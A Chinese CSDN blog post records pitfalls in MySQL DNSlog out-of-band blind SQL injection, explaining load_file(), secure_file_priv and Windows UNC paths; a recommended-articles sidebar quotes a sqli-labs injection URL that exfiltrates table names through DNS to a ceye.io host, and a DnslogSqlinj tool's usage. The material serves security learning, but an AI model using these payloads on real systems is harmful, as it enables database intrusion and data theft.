concat拼接的坑 mysql_DNSlog注入踩坑记录:

最新推荐文章于 2022-08-01 22:41:25 发布
最新推荐文章于 2022-08-01 22:41:25 发布
阅读量275 收藏
点赞数
文章标签: concat拼接的坑 mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39963465/article/details/112161608
版权

我遇到了两个巨坑,加上http://ceye.io/,经常无法访问,记录一下心酸的踩坑历史。

直接将两个巨坑放到最前面,提醒后人!!

1. sql盲注,后端数据库用的mysql数据库,说一下用dnslog回显只能用于windows系统,原理就是''代表Microsoft Windows通用命名约定(UNC)的文件和目录路径格式利用任何以下扩展存储程序引发DNS地址解析。双斜杠表示网络资源路径多加两个就是转义了反斜杠。

2. 通过DNSlog盲注需要用的load_file()函数,所以一般得是root权限。show variables like '%secure%';查看load_file()可以读取的磁盘。

1、当secure_file_priv为空,就可以读取磁盘的目录。
2、当secure_file_priv为G:,就可以读取G盘的文件。
3、当secure_file_priv为null,load_file就不能加载文件。
我当初的:直接在centos上进行测试,之后在win10上测试的时候没有使用这个函数进行查看。
直接被自己蠢哭.... ...

通过设置my.ini来配置。secure_file_priv=""就是可以load_flie任意磁盘的文件。先简单介绍一下原理:

关于OOB
out-of-band带外数据(OOB)与inband相反,它是一种通过其他传输方式来窃取数据的技术(例如利用DNS解析协议和电子邮件)。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求,然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则,即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器(DNS)中提取数据,则被认为是最隐蔽有效的方法。

DNSlog在Web漏洞利用简单理解就是在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起DNS请求,这个时候就可以通过这种方式把想获得的数据外带出来。

这里使用的DNS的原因是:DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息 简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。

上张图:

最低0.47元/天 解锁文章
weixin_39963465
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql group concat 附加到每一行数据_MySQL_函数GROUP_CONCAT_合并多行数据到一行
weixin_28981373的博客
02-01 111
GROUP_CONCAT(expr)该函数返回带有来自一个组的连接的非NULL值的字符串结果。其完整的语法如下所示:GROUP_CONCAT([DISTINCT] expr [,expr ...][ORDER BY {unsigned_integer | col_name | expr}[ASC | DESC] [,col_name ...]][SEPARATOR str_val])在MySQL中...
CEYE平台使用简介
Fly_鹏程万里
08-10 8902
CEYE简介 CEYE是一个用于检测带外数据(Out-of-Band)的监控平台,例如DNS查询和HTTP请求。它可以帮助安全研究人员在测试漏洞时收集信息(例如SSRF/ XXE/ RCE等)。 CEYE的使用场景 CEYE的诞生也是因为它的使用场景而孕育而生的,一般有两种常见的情况会导致许多漏洞扫描工具漏扫: 漏洞检测或漏洞利用需要进一步的用户或系统交互。 一些漏洞类型没有直接表明...
mysql-dnslog注入
Adminxe的博客
05-05 1852
@Adminxe http://ceye.io/ //dnslog注入平台 dnslog原理简介: 简单理解就是在利用注入漏洞的时候,页面无回显,无法直接获得回显信息的情况下,目标可以发起DNS请求,这时就可以尝试通过DNSlog注入的方式把想获得的数据外带出来。 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设...
unc 通用命名规则
黑鸟酱
02-23 1122
     在网络中,通用命名规则(UNC,Universal Naming Convention)一种辨别一个位于电脑中的共享文件,而不需要指定(和不知道)它的存储设备的方式。在Windows操作系统、Novell NetWare ,以及其他一些可能的操作系统,UNC 都可以用来替代本地命名系统(例如Windows中的DOS命名系统)。       在Windows操作系统中,UNC...
模糊查询-防止sql注入
xiaoguaihu12的博客
09-06 1930
在mapper中写 模糊查询,按名称查询时,直接在sql语句中写%x%,等于写死在里面了,以后 每次查询都需要改动,那怎么办呢? 1.加入concat()关键字:concat('%',#{name},'%') 不常用,比较麻烦。动态参数 底层调用parperedStatement 可防止sql注入 2.'%' #{name} '%' 常用 中间有空格注意。动态参数 底层调用parpere...
MySQL拼接字符串函数GROUP_CONCAT详解
09-08
总之,GROUP_CONCAT函数是MySQL中处理字符串拼接的利器,尤其在需要对分组数据进行汇总时,能提供非常方便的功能。了解并熟练掌握它的使用,对于优化数据查询和报告非常有帮助。在实际应用中,可以根据需求灵活地...
如何修改Mysql中group_concat的长度限制
09-09
在MySQL数据库中,`GROUP_CONCAT` 函数是一个非常实用的工具,它允许你在聚合查询中将多个行的某个列值合并成一个单一的字符串,每个值之间由默认的逗号分隔。然而,当你处理大量数据时,可能会遇到一个限制,即`...
MySQL GROUP_CONCAT限制解决方案
12-14
 GROUP_CONCAT函数可以拼接某个字段值成字符串,默认的分隔符是 逗号,即”,” ,  如果需要自定义分隔符可以使用 SEPARATOR  如: SELECT GROUP_CONCAT(name SEPARATOR '_') FROM user 限制:  GROUP_CONCAT...
Mybatis中的concat()函数是如何防止sql注入的 理解整理
我叫鱿鱼须的博客
10-27 3944
前言: 刚开始接触Mybatis时,对于xml文件中的concat()函数的使用不是太理解,现在终于搞明白的,其实不难理 CustomerMapper.xml文件下的 配置: <!-- bind的测试 --> <select id="findCustomerByName1" parameterType="customer" resultType="customer"> <bind name="parttern_username" value="username"/
DNSlog盲注
weixin_42478365的博客
03-08 104
原因(该方法只适合在windows服务器上) 案例: 根据数据库查表: http://192.168.239.146/sqli-labs-master/Less-9/?id=1' and load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.hzaskx.ceye.io\\abc'))--+ #### 根据表查字段
DnslogSqlinj
05-10
DnslogSqlinj 具有ceye.io的DnsLog SQL注入工具 用法 Usage: dnslogSql.py [options] -u http://10.1.1.9/sqli-labs/Less-9/?id=1' and ({})--+ Options: --version show program's version number and exit -h, --help show this help message and exit -n TASKNAME, --name=TASKNAME task name -t THREAD_COUNT, --thread=THREAD_COUNT thread_count -
MySQL使用LOAD_FILE()函数方法总结
09-09
在本篇文章里小编给大家分享了关于MySQL使用LOAD_FILE()函数方法和相关知识点,需要的朋友们学习下。
DNSlogSqlinj注入,解决kali2022DNSlogSqlinj报错问题。
qq_60463414的博客
08-01 1272
解决kali2022中DnslogSqlinj工具,在使用中报错问题。
2021-11-13加解密,二次,load_file&dnslog等注入换地方写了
weixin_44532761的博客
11-17 8163
小迪v17
DNSlog外带原理及注入分析
热门推荐
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
c语言中双反斜杠的作用,有关c语言中的反斜杠 '\'
weixin_33942142的博客
05-16 4131
2020-02-02关键字:反斜杠趣谈稍微懂点编程的同学,甭管是哪种编程语言,都知道甚至是在代码中用过反斜杠。反斜杠这东西的最为人所知的作用就是作为“转义字符”以及“连接符”来使用。例如,常见的正则表达式用途:grep -nr "init*\.rc"以及在 c语言 领域常见的连接代码用途:#define LOG(a,b) do{\printf("[LOG]%d--%d", a, b); \}whi...
每天一个lodash方法-concat
weixin_33912445的博客
03-28 1268
腱鞘炎犯了。第三天就没坚持住,罪过罪过。 concat源码链接 功能 创建一个用任何数组 或 值连接的新数组。 使用方法 * var array = [1]; * var other = _.concat(array, 2, [3], [[4]]); * * console.log(other); * // => [1, ...
Mssql注入——dns注入,反弹注入
weixin_46601374的博客
02-28 2713
DNS注入 DNS注入原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接到域名中,访问时将访问服务器,记录后查看日志。 load_file函数的作用 用于读取文件内容,并返回输出 load_file函数是什么 load_file 读取文件函数,读取的内容返回为字符串输出。 load_file函数在注入的作用 利用读取注入的报错信息,然后返回报错信息(显
sql注入之 读文件 写文件 带外 二次注入 堆叠注入
weixin_44276341的博客
02-10 532
二次解码注入 url编码 在前面加上% 比如\ 它的ascii码是92 那么92对应的16进制是5c 所以它的url是%5c php解码函数 urlcode() rawurlcode() 默认的GET和POST请求 ,php会先解码一次 例如 admin’ –> admin%27 -> admin%2527 -> admin %27 -> (转移函数) -&...
all_features = pd.concat((train_data.iloc[:, 1:-1], test_data.iloc[:, 1:]))为什么里面要用两层圆括号
最新发布
05-24
这是因为`pd.concat()`函数需要传递一个元组对象(tuple),而圆括号可以用来表示元组。所以,第一层圆括号是用来将`train_data.iloc[:, 1:-1]`和`test_data.iloc[:, 1:]`两个DataFrame对象合并成一个元组对象的。第...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值